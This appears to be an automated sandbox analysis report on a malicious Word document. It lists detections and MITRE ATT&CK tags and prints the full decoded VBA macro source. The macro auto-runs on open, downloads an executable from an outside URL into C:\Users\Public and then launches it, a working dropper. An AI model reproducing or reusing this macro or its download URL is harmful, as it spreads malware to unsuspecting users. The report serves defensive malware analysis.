MALICIOUS
286
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample contains VBA macros with AutoOpen, AutoNew, and AutoClose subroutines. The AutoNew subroutine uses URLDownloadToFile to download a file named 'Acrobat.exe' from 'http://www.unicauca.edu.co/regionalizacion/sites/default/files/kavach-1-5/Acrobat.exe' to 'C:\Users\Public\Ping.exe'. The AutoClose subroutine then executes this downloaded file. The document body attempts to lure the user into interacting with the document by suggesting an update is required.
Heuristics 8
-
ClamAV: Doc.Malware.Mrafr-10020543-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Mrafr-10020543-0
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Sub autoclose() Shell ("C:\Users\Public\Ping.exe") End Sub -
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
Attribute VB_Name = "NewMacros" Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _ Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, _ -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() curfile = ActiveDocument.Path & "\" & ActiveDocument.Name -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub autoclose() Shell ("C:\Users\Public\Ping.exe") -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
curfile = ActiveDocument.Path & "\" & ActiveDocument.Name templatefile = Environ("appdata") & "\Microsoft\Templates\" & DateDiff("s", #1/1/1970#, Now()) & ".dotm" ActiveDocument.SaveAs2 FileName:=templatefile, FileFormat:=wdFormatXMLTemplateMacroEnabled, AddToRecentFiles:=True -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.unicauca.edu.co/regionalizacion/sites/default/files/kavach-1-5/Acrobat.exe Referenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1343 bytes |
SHA-256: 0638f0f9bd27264ca0ad7b373a7be75d4084abe66b47182b57491e2faddb7873 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, _
ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Sub autoopen()
curfile = ActiveDocument.Path & "\" & ActiveDocument.Name
templatefile = Environ("appdata") & "\Microsoft\Templates\" & DateDiff("s", #1/1/1970#, Now()) & ".dotm"
ActiveDocument.SaveAs2 FileName:=templatefile, FileFormat:=wdFormatXMLTemplateMacroEnabled, AddToRecentFiles:=True
ActiveDocument.SaveAs2 FileName:=curfile, FileFormat:=wdFormatXMLDocumentMacroEnabled
Documents.Add Template:=templatefile, NewTemplate:=False, DocumentType:=0
End Sub
Sub autonew()
imgsrc = "http://www.unicauca.edu.co/regionalizacion/sites/default/files/kavach-1-5/Acrobat.exe"
dlpath = "C:\Users\Public\\"
URLDownloadToFile 0, imgsrc, dlpath & "Ping.exe", 0, 0
End Sub
Sub autoclose()
Shell ("C:\Users\Public\Ping.exe")
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 18944 bytes |
SHA-256: a2c37af466f7d301fe8ed055ecd2a30fee3b5f24545ccae965cffddec7e84315 |
|||
|
Detection
ClamAV:
Doc.Malware.Mrafr-10020543-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.